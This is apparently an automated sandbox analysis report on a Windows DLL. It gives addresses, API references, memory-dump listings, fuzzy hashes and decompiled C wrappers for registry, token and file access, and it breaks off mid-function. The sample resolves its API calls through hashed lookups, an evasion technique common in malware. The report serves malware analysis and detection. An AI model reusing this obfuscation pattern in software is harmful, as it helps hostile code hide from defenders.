0x6fc51179
0x6fc51184
0x6fc511be
0x6fc511c3
0x6fc511c8
0x6fc511c8
0x6fc511d4
0x6fc51186
0x6fc51190
0x6fc511a3
0x6fc511b4
0x6fc511b4
0x6fc511b6
0x6fc511bc
0x6fc511da
0x6fc511ea
0x6fc51201
0x6fc512e3
0x6fc512e7
0x00000000
0x6fc51207
0x6fc51217
0x6fc5121b
0x00000000
0x6fc51221
0x6fc5122d
0x6fc51234
0x00000000
0x6fc5123a
0x6fc5123a
0x6fc5123c
0x6fc5123d
0x6fc5123d
0x6fc51234
0x6fc5121b
0x00000000
0x00000000
0x00000000
0x6fc511bc

APIs

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,D0443458,D0443458,D0443458,D0443458), ref: 6FC511B4
GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,D0443458,D0443458,00000000,00000000,D0443458,D0443458,D0443458,D0443458), ref: 6FC51217

Memory Dump Source

Source File: 00000002.00000002.1044679417.000000006FC41000.00000020.00020000.sdmp, Offset: 6FC40000, based on PE: true

Associated: 00000002.00000002.1044641532.000000006FC40000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044767151.000000006FC5A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044782668.000000006FC5D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1044790909.000000006FC5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: b379fc4a1587b84ebba4738689b04ff7e367b1b7f2a9b7906a93c638fa51d113
Instruction ID: 7dbc49c014a5d1dce97e2a9e493291f0d0ab88ff807ce4196ce3617c0f2209e5
Opcode Fuzzy Hash: b379fc4a1587b84ebba4738689b04ff7e367b1b7f2a9b7906a93c638fa51d113
Instruction Fuzzy Hash: 7F219C706083026EFB05DE688C18FAB66E9AFD1204F108929B450D62A0FF34D829C769

Uniqueness

Uniqueness Score: -1.00%

Function 6FC55720, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E6FC55720(void* __ecx, char* _a4, intOrPtr _a8) {
				int _v16;
				int _v20;
				intOrPtr _t11;
				int* _t12;
				int _t13;
				void* _t23;
				char* _t35;
				int* _t38;

				_push(_t34);
				_t23 = __ecx;
				_t11 =  *((intOrPtr*)(__ecx + 4));
				if(_t11 == 0 || _t11 == 0xffffffff) {
					_t12 = 1;
				} else {
					_t12 = 0;
				}
				if(_t12 != 0) {
					L10:
					_t13 = 0;
				} else {
					_t35 = _a4;
					if(_t35 == 0 ||  *_t35 != 0) {
						_v20 = 0;
						_v16 = 0;
						if(E6FC52F8C(0xd0443458, 0x91134e46) != 0) {
							RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, 0,  &_v16); // executed
						}
						_t15 = _v16;
						if(_v16 != 0) {
							E6FC4F8C4(_a8, _t15);
							if(E6FC52F8C(0xd0443458, 0x91134e46) != 0) {
								RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, E6FC4F558(_a8, 0),  &_v20); // executed
							}
							_t13 = _v20;
						} else {
							goto L10;
						}
					} else {
						goto L10;
					}
				}
				return _t13;
			}

0x6fc55724
0x6fc55725
0x6fc55727
0x6fc5572c
0x6fc55733
0x6fc55737
0x6fc55737
0x6fc55737
0x6fc5573b
0x6fc55781
0x6fc55781
0x6fc5573d
0x6fc5573d
0x6fc55743
0x6fc5574c
0x6fc5574f
0x6fc55766
0x6fc55777
0x6fc55777
0x6fc55779
0x6fc5577f
0x6fc5578a
0x6fc557a2
0x6fc557c2
0x6fc557c2
0x6fc557c4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6fc55743
0x6fc557cc

APIs

RegQueryValueExA.KERNELBASE(?,6FC5D1F8,00000000,?,00000000,00000000,?,?,?,6FC5D1F8,?,6FC557F3,?,00000000,00000000), ref: 6FC55777
RegQueryValueExA.KERNELBASE(?,6FC5D1F8,00000000,?,00000000,00000000,00000000,00000000,?,?,?,6FC5D1F8,?,6FC557F3,?,00000000), ref: 6FC557C2

Memory Dump Source

Source File: 00000002.00000002.1044679417.000000006FC41000.00000020.00020000.sdmp, Offset: 6FC40000, based on PE: true

Associated: 00000002.00000002.1044641532.000000006FC40000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044767151.000000006FC5A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044782668.000000006FC5D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1044790909.000000006FC5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: cdff03e19aa9d02ca93ff40d7f69fa03f4eaa6943e7be9b0135aaa3fabe45ce6
Instruction ID: 5596efaac86049ab80de4d5a39541ce78d1c60fe76f990a4354809e744ebba29
Opcode Fuzzy Hash: cdff03e19aa9d02ca93ff40d7f69fa03f4eaa6943e7be9b0135aaa3fabe45ce6
Instruction Fuzzy Hash: 0811B17121C305FFE7119E29DC90EABB7DCEF8169CF00491DB4949B180FA20E8209669

Uniqueness

Uniqueness Score: -1.00%

Function 6FC55AA8, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E6FC55AA8(WCHAR** __ecx, void* __edx, intOrPtr _a4, long _a8, long _a12) {
				char _v24;
				void* __esi;
				void* _t16;
				void* _t21;
				void* _t24;
				void* _t29;
				long _t37;
				void* _t38;
				long _t39;
				WCHAR** _t40;
				intOrPtr* _t56;
				WCHAR** _t58;
				char* _t64;
				void* _t65;
				long _t66;

				_push(0);
				_push(_t62);
				_t66 = _t65 - 0x10;
				_t58 = __ecx;
				_t37 = _a8;
				if(E6FC4D288(__ecx, 0x2f) != 0) {
					_t62 = _t66;
					E6FC4D78C(__ecx, _t66);
					E6FC4D0B4(_t58,  *_t66);
					E6FC4D098(_t66);
				}
				if(_t37 == 0) {
					_t70 = _a4 - 1;
					if(_a4 != 1) {
						__eflags = _a4 - 4;
						_t37 = (0 | _a4 == 0x00000004) + 2;
						__eflags = _t37;
					} else {
						_t37 = 1;
					}
				}
				E6FC5621C(_t70);
				if(_a4 <= 5) {
					goto __eax;
				}
				_t62 = 0;
				if(_t37 != 2) {
					_t16 = 3;
					__eflags = _t37 - 1;
					_t38 = 0;
					_t39 =  ==  ? _t16 : _t38;
				} else {
					_t39 = 1;
				}
				if(E6FC52F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t29 = CreateFileW( *_t58, 0, _t39, 0, _t62, _a12, 0); // executed
					_push(_t29);
				}
				_t40 =  &(_t58[3]);
				E6FC4C328(_t40);
				if(E6FC4C33C(_t40) != 0) {
					_t58[2] = E6FC5352C(0);
					_t21 = 0;
					goto L19;
				} else {
					if(_a4 == 2) {
						_t56 = E6FC52F8C(0x4bcc7cba, 0xceed09cc);
						__eflags = _t56;
						if(_t56 != 0) {
							 *_t56( *_t40, 0, 0, 2);
						}
					}
					_t64 =  &_v24;
					E6FC535D4(_t64, 0xff, 8);
					_t66 = _t66 + 0xc;
					_t24 = E6FC52F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t24 == 0) {
						_t21 = 1;
						__eflags = 1;
						L19:
						return _t21;
					} else {
						_push(_t64);
						_push(_t64);
						_push(0);
						_push( *_t40);
						asm("int3");
						return _t24;
					}
				}
			}

0x6fc55aa8
0x6fc55aab
0x6fc55aac
0x6fc55aaf
0x6fc55ab1
0x6fc55abe
0x6fc55ac2
0x6fc55ac6
0x6fc55ad0
0x6fc55ad7
0x6fc55ad7
0x6fc55ade
0x6fc55ae0
0x6fc55ae5
0x6fc55aee
0x6fc55af6
0x6fc55af6
0x6fc55ae7
0x6fc55ae9
0x6fc55ae9
0x6fc55ae5
0x6fc55afb
0x6fc55b07
0x6fc55b1d
0x6fc55b1d
0x6fc55c38
0x6fc55b75
0x6fc55b7e
0x6fc55b7f
0x6fc55b84
0x6fc55b85
0x6fc55b77
0x6fc55b79
0x6fc55b79
0x6fc55b9b
0x6fc55baf
0x6fc55b9d
0x6fc55baa
0x6fc55bac
0x6fc55bac
0x6fc55bb1
0x6fc55bb6
0x6fc55bc4
0x6fc55c2f
0x6fc55c32
0x00000000
0x6fc55bc6
0x6fc55bcb
0x6fc55c18
0x6fc55c1a
0x6fc55c1c
0x6fc55c26
0x6fc55c26
0x6fc55c1c
0x6fc55bcd
0x6fc55bd9
0x6fc55bde
0x6fc55beb
0x6fc55bf2
0x6fc55bfe
0x6fc55bfe
0x6fc55bff
0x6fc55c06
0x6fc55bf4
0x6fc55bf4
0x6fc55bf5
0x6fc55bf6
0x6fc55bf8
0x6fc55bfa
0x6fc55bfb
0x6fc55bfb
0x6fc55bf2

Memory Dump Source

Source File: 00000002.00000002.1044679417.000000006FC41000.00000020.00020000.sdmp, Offset: 6FC40000, based on PE: true

Associated: 00000002.00000002.1044641532.000000006FC40000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044767151.000000006FC5A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044782668.000000006FC5D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1044790909.000000006FC5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef1cfd8fdaff683cb6308fc2e1e52c5739966e883b26155366f3469cf7f1cff3
Instruction ID: 4e0bfb11ac99187c99cb63f723338c9bf77fe7fbde3ab2ed9846d5245dd4827c
Opcode Fuzzy Hash: ef1cfd8fdaff683cb6308fc2e1e52c5739966e883b26155366f3469cf7f1cff3
Instruction Fuzzy Hash: 5231F375384316AEE7106A798C95F7F76DAEF8620CF000D29F9519A0C1FB61E938826D

Uniqueness

Uniqueness Score: -1.00%

Function 033F2439, Relevance: 1.6, APIs: 1, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 033F2508

Memory Dump Source

Source File: 00000002.00000002.1042515814.00000000033F0000.00000040.00000001.sdmp, Offset: 033F0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 322985cbc6b329361440b944878d16ac71fd2e61fcf0ea9c520e209294cd040f
Instruction ID: 3f9c90fbbe7146e216822ae3fdb538d71426f0df45722d3df21d23c09fa07e37
Opcode Fuzzy Hash: 322985cbc6b329361440b944878d16ac71fd2e61fcf0ea9c520e209294cd040f
Instruction Fuzzy Hash: 3A31D6B5E00628CFDB14CF69C98069DB7F1FF88200F55869AD949A7346D731AE81CF81

Uniqueness

Uniqueness Score: -1.00%

Function 6FC55B51, Relevance: 1.6, APIs: 1, Instructions: 63
fileCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E6FC55B51(void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t15;
				void* _t20;
				void* _t21;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t32;
				WCHAR** _t33;
				long _t37;
				void* _t39;
				void* _t40;

				_t33 = __edi;
				if(__edx != 0) {
					_t37 = 3;
					if(_t21 != 2) {
						_t7 = 3;
						_t22 = 0;
						_t23 =  ==  ? _t7 : _t22;
					} else {
						_t23 = 1;
					}
					if(E6FC52F8C(0x4bcc7cba, 0x80c50a91) == 0) {
						_push(0);
					} else {
						_t20 = CreateFileW( *_t33, 0x80000000, _t23, 0, _t37, _a44, 0); // executed
						_push(_t20);
					}
					_t24 =  &(_t33[3]);
					E6FC4C328(_t24);
					if(E6FC4C33C(_t24) != 0) {
						_t33[2] = E6FC5352C(0x80000000);
						_t12 = 0;
						goto L14;
					} else {
						if( *((intOrPtr*)(_t40 + 0x24)) == 2) {
							_t32 = E6FC52F8C(0x4bcc7cba, 0xceed09cc);
							if(_t32 != 0) {
								 *_t32( *_t24, 0, 0, 2);
							}
						}
						_t39 = _t40 + 8;
						E6FC535D4(_t39, 0xff, 8);
						_t40 = _t40 + 0xc;
						_t15 = E6FC52F8C(0x4bcc7cba, 0xaaa9bb);
						if(_t15 == 0) {
							_t12 = 1;
							goto L14;
						} else {
							_push(_t39);
							_push(_t39);
							_push(0);
							_push( *_t24);
							asm("int3");
							return _t15;
						}
					}
				} else {
					__edi[2] = 2;
					_t12 = 0;
					L14:
					return _t12;
				}
			}

0x6fc55b51
0x6fc55b53
0x6fc55b6a
0x6fc55b75
0x6fc55b7e
0x6fc55b84
0x6fc55b85
0x6fc55b77
0x6fc55b79
0x6fc55b79
0x6fc55b9b
0x6fc55baf
0x6fc55b9d
0x6fc55baa
0x6fc55bac
0x6fc55bac
0x6fc55bb1
0x6fc55bb6
0x6fc55bc4
0x6fc55c2f
0x6fc55c32
0x00000000
0x6fc55bc6
0x6fc55bcb
0x6fc55c18
0x6fc55c1c
0x6fc55c26
0x6fc55c26
0x6fc55c1c
0x6fc55bcd
0x6fc55bd9
0x6fc55bde
0x6fc55beb
0x6fc55bf2
0x6fc55bfe
0x00000000
0x6fc55bf4
0x6fc55bf4
0x6fc55bf5
0x6fc55bf6
0x6fc55bf8
0x6fc55bfa
0x6fc55bfb
0x6fc55bfb
0x6fc55bf2
0x6fc55b55
0x6fc55b55
0x6fc55b5c
0x6fc55bff
0x6fc55c06
0x6fc55c06

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 6FC55BAA

Memory Dump Source

Source File: 00000002.00000002.1044679417.000000006FC41000.00000020.00020000.sdmp, Offset: 6FC40000, based on PE: true

Associated: 00000002.00000002.1044641532.000000006FC40000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044767151.000000006FC5A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044782668.000000006FC5D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1044790909.000000006FC5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 26c16dd84db9d2095020c93a0a859f32a102ea0508fef39e3b0ec55714086586
Instruction ID: 60bc3da60500d0c31889405ed2dc001f1bdf45fc2258125dc3f71b7dda6f4e00
Opcode Fuzzy Hash: 26c16dd84db9d2095020c93a0a859f32a102ea0508fef39e3b0ec55714086586
Instruction Fuzzy Hash: 1701F935784306BAE71056299C85F6B7759EF8235CF104D65F8505A0C1FB62A43C8169

Uniqueness

Uniqueness Score: -1.00%

Function 6FC55B29, Relevance: 1.6, APIs: 1, Instructions: 57
fileCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E6FC55B29(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t15;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				void* _t31;
				intOrPtr* _t33;
				WCHAR** _t34;
				void* _t38;
				long _t39;
				void* _t41;
				void* _t42;

				_t34 = __edi;
				_t31 = 5;
				_t38 = 2;
				_t39 =  !=  ? _t31 : _t38;
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6FC52F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t39, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6FC4C328(_t24);
				if(E6FC4C33C(_t24) != 0) {
					_t34[2] = E6FC5352C(0xc0000000);
					_t12 = 0;
					goto L12;
				} else {
					if( *((intOrPtr*)(_t42 + 0x24)) == 2) {
						_t33 = E6FC52F8C(0x4bcc7cba, 0xceed09cc);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t41 = _t42 + 8;
					E6FC535D4(_t41, 0xff, 8);
					_t42 = _t42 + 0xc;
					_t15 = E6FC52F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t15 == 0) {
						_t12 = 1;
						L12:
						return _t12;
					} else {
						_push(_t41);
						_push(_t41);
						_push(0);
						_push( *_t24);
						asm("int3");
						return _t15;
					}
				}
			}

0x6fc55b29
0x6fc55b2d
0x6fc55b30
0x6fc55b33
0x6fc55b75
0x6fc55b7e
0x6fc55b84
0x6fc55b85
0x6fc55b77
0x6fc55b79
0x6fc55b79
0x6fc55b9b
0x6fc55baf
0x6fc55b9d
0x6fc55baa
0x6fc55bac
0x6fc55bac
0x6fc55bb1
0x6fc55bb6
0x6fc55bc4
0x6fc55c2f
0x6fc55c32
0x00000000
0x6fc55bc6
0x6fc55bcb
0x6fc55c18
0x6fc55c1c
0x6fc55c26
0x6fc55c26
0x6fc55c1c
0x6fc55bcd
0x6fc55bd9
0x6fc55bde
0x6fc55beb
0x6fc55bf2
0x6fc55bfe
0x6fc55bff
0x6fc55c06
0x6fc55bf4
0x6fc55bf4
0x6fc55bf5
0x6fc55bf6
0x6fc55bf8
0x6fc55bfa
0x6fc55bfb
0x6fc55bfb
0x6fc55bf2

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 6FC55BAA

Memory Dump Source

Source File: 00000002.00000002.1044679417.000000006FC41000.00000020.00020000.sdmp, Offset: 6FC40000, based on PE: true

Associated: 00000002.00000002.1044641532.000000006FC40000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044767151.000000006FC5A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044782668.000000006FC5D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1044790909.000000006FC5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 0fa86986c89fdfff574c3ac8d82252a53ce624ce43e07f87df1cda0750746311
Instruction ID: 9b38b2f7364d421ec06eab1127cc5925106f3586f951857238bfff9a0c135d76
Opcode Fuzzy Hash: 0fa86986c89fdfff574c3ac8d82252a53ce624ce43e07f87df1cda0750746311
Instruction Fuzzy Hash: 6301F231380306BEEB1016298C45FBB7699EFC234CF004D65B9506A0D1FF61A8388129

Uniqueness

Uniqueness Score: -1.00%

Function 6FC55B3D, Relevance: 1.6, APIs: 1, Instructions: 56
fileCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E6FC55B3D(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t15;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t33;
				WCHAR** _t34;
				long _t38;
				void* _t40;
				void* _t41;

				_t34 = __edi;
				_t38 = 2;
				asm("adc ebp, 0x0");
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6FC52F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t38, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6FC4C328(_t24);
				if(E6FC4C33C(_t24) != 0) {
					_t34[2] = E6FC5352C(0xc0000000);
					_t12 = 0;
					goto L12;
				} else {
					if( *((intOrPtr*)(_t41 + 0x24)) == 2) {
						_t33 = E6FC52F8C(0x4bcc7cba, 0xceed09cc);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t40 = _t41 + 8;
					E6FC535D4(_t40, 0xff, 8);
					_t41 = _t41 + 0xc;
					_t15 = E6FC52F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t15 == 0) {
						_t12 = 1;
						L12:
						return _t12;
					} else {
						_push(_t40);
						_push(_t40);
						_push(0);
						_push( *_t24);
						asm("int3");
						return _t15;
					}
				}
			}

0x6fc55b3d
0x6fc55b44
0x6fc55b47
0x6fc55b75
0x6fc55b7e
0x6fc55b84
0x6fc55b85
0x6fc55b77
0x6fc55b79
0x6fc55b79
0x6fc55b9b
0x6fc55baf
0x6fc55b9d
0x6fc55baa
0x6fc55bac
0x6fc55bac
0x6fc55bb1
0x6fc55bb6
0x6fc55bc4
0x6fc55c2f
0x6fc55c32
0x00000000
0x6fc55bc6
0x6fc55bcb
0x6fc55c18
0x6fc55c1c
0x6fc55c26
0x6fc55c26
0x6fc55c1c
0x6fc55bcd
0x6fc55bd9
0x6fc55bde
0x6fc55beb
0x6fc55bf2
0x6fc55bfe
0x6fc55bff
0x6fc55c06
0x6fc55bf4
0x6fc55bf4
0x6fc55bf5
0x6fc55bf6
0x6fc55bf8
0x6fc55bfa
0x6fc55bfb
0x6fc55bfb
0x6fc55bf2

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 6FC55BAA

Memory Dump Source

Source File: 00000002.00000002.1044679417.000000006FC41000.00000020.00020000.sdmp, Offset: 6FC40000, based on PE: true

Associated: 00000002.00000002.1044641532.000000006FC40000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044767151.000000006FC5A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044782668.000000006FC5D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1044790909.000000006FC5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 5b8d02cd4674f4ed770eb1c7c80a412027ed08d7cd8f65890b2514b95d1dd015
Instruction ID: 93aeb21783742eb4cb10aebe2dee10054f7da574ff61de151dc1a954822e1cd2
Opcode Fuzzy Hash: 5b8d02cd4674f4ed770eb1c7c80a412027ed08d7cd8f65890b2514b95d1dd015
Instruction Fuzzy Hash: 64012635780307BEEB1056298C85FBF769AEFC234CF004D65B950660D1FF62A83C8129

Uniqueness

Uniqueness Score: -1.00%

Function 6FC55B1F, Relevance: 1.6, APIs: 1, Instructions: 52
fileCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E6FC55B1F(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t14;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6FC52F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0x100, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6FC4C328(_t23);
				if(E6FC4C33C(_t23) != 0) {
					_t31[2] = E6FC5352C(0x100);
					_t11 = 0;
					goto L12;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6FC52F8C(0x4bcc7cba, 0xceed09cc);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6FC535D4(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					_t14 = E6FC52F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t14 == 0) {
						_t11 = 1;
						L12:
						return _t11;
					} else {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						return _t14;
					}
				}
			}

0x6fc55b1f
0x6fc55b26
0x6fc55b75
0x6fc55b7e
0x6fc55b84
0x6fc55b85
0x6fc55b77
0x6fc55b79
0x6fc55b79
0x6fc55b9b
0x6fc55baf
0x6fc55b9d
0x6fc55baa
0x6fc55bac
0x6fc55bac
0x6fc55bb1
0x6fc55bb6
0x6fc55bc4
0x6fc55c2f
0x6fc55c32
0x00000000
0x6fc55bc6
0x6fc55bcb
0x6fc55c18
0x6fc55c1c
0x6fc55c26
0x6fc55c26
0x6fc55c1c
0x6fc55bcd
0x6fc55bd9
0x6fc55bde
0x6fc55beb
0x6fc55bf2
0x6fc55bfe
0x6fc55bff
0x6fc55c06
0x6fc55bf4
0x6fc55bf4
0x6fc55bf5
0x6fc55bf6
0x6fc55bf8
0x6fc55bfa
0x6fc55bfb
0x6fc55bfb
0x6fc55bf2

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 6FC55BAA

Memory Dump Source

Source File: 00000002.00000002.1044679417.000000006FC41000.00000020.00020000.sdmp, Offset: 6FC40000, based on PE: true

Associated: 00000002.00000002.1044641532.000000006FC40000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044767151.000000006FC5A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044782668.000000006FC5D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1044790909.000000006FC5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c230670b004b2ad28e76934f353d99ed69517ec83133175e69b5ed079cd00cba
Instruction ID: 0476ced0eca8db66c39c4d3b9a92ffdea01881194084ff3f36966a1319850954
Opcode Fuzzy Hash: c230670b004b2ad28e76934f353d99ed69517ec83133175e69b5ed079cd00cba
Instruction Fuzzy Hash: E801F431780307BAEB1156298C85FBF769DEF8634CF000D69B990650D1FF62A53C8139

Uniqueness

Uniqueness Score: -1.00%

Function 6FC55B6D, Relevance: 1.6, APIs: 1, Instructions: 51
fileCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E6FC55B6D(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t14;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6FC52F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6FC4C328(_t23);
				if(E6FC4C33C(_t23) != 0) {
					_t31[2] = E6FC5352C(0);
					_t11 = 0;
					goto L12;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6FC52F8C(0x4bcc7cba, 0xceed09cc);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6FC535D4(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					_t14 = E6FC52F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t14 == 0) {
						_t11 = 1;
						L12:
						return _t11;
					} else {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						return _t14;
					}
				}
			}

0x6fc55b6d
0x6fc55b71
0x6fc55b75
0x6fc55b7e
0x6fc55b84
0x6fc55b85
0x6fc55b77
0x6fc55b79
0x6fc55b79
0x6fc55b9b
0x6fc55baf
0x6fc55b9d
0x6fc55baa
0x6fc55bac
0x6fc55bac
0x6fc55bb1
0x6fc55bb6
0x6fc55bc4
0x6fc55c2f
0x6fc55c32
0x00000000
0x6fc55bc6
0x6fc55bcb
0x6fc55c18
0x6fc55c1c
0x6fc55c26
0x6fc55c26
0x6fc55c1c
0x6fc55bcd
0x6fc55bd9
0x6fc55bde
0x6fc55beb
0x6fc55bf2
0x6fc55bfe
0x6fc55bff
0x6fc55c06
0x6fc55bf4
0x6fc55bf4
0x6fc55bf5
0x6fc55bf6
0x6fc55bf8
0x6fc55bfa
0x6fc55bfb
0x6fc55bfb
0x6fc55bf2

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 6FC55BAA

Memory Dump Source

Source File: 00000002.00000002.1044679417.000000006FC41000.00000020.00020000.sdmp, Offset: 6FC40000, based on PE: true

Associated: 00000002.00000002.1044641532.000000006FC40000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044767151.000000006FC5A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044782668.000000006FC5D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1044790909.000000006FC5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f41fd778113157c199e1483cbf3e3356fcc1afe5b5c32d8304a410e71b511c74
Instruction ID: d18480f1f13e8d7c9d5f0a26ac1ccd2f41438eac1a43be873d5b0c959734de07
Opcode Fuzzy Hash: f41fd778113157c199e1483cbf3e3356fcc1afe5b5c32d8304a410e71b511c74
Instruction Fuzzy Hash: 90F02835780307BAEB1116258C85FBF765DEF8274CF000D69B951650D1FF62A53C8139

Uniqueness

Uniqueness Score: -1.00%

Function 6FC55D7C, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6FC55D7C(void* __ecx, intOrPtr _a4) {
				long _v16;
				long _t4;
				void* _t8;
				void** _t9;
				intOrPtr _t17;
				long* _t18;

				_push(_t16);
				_t8 = __ecx;
				_t17 = _a4;
				if(_t17 != 0) {
					asm("pxor xmm0, xmm0");
					asm("movq [esi], xmm0");
				}
				_t9 = _t8 + 0xc;
				if(E6FC4C33C(_t9) != 0) {
					L7:
					_t4 = 0;
					goto L10;
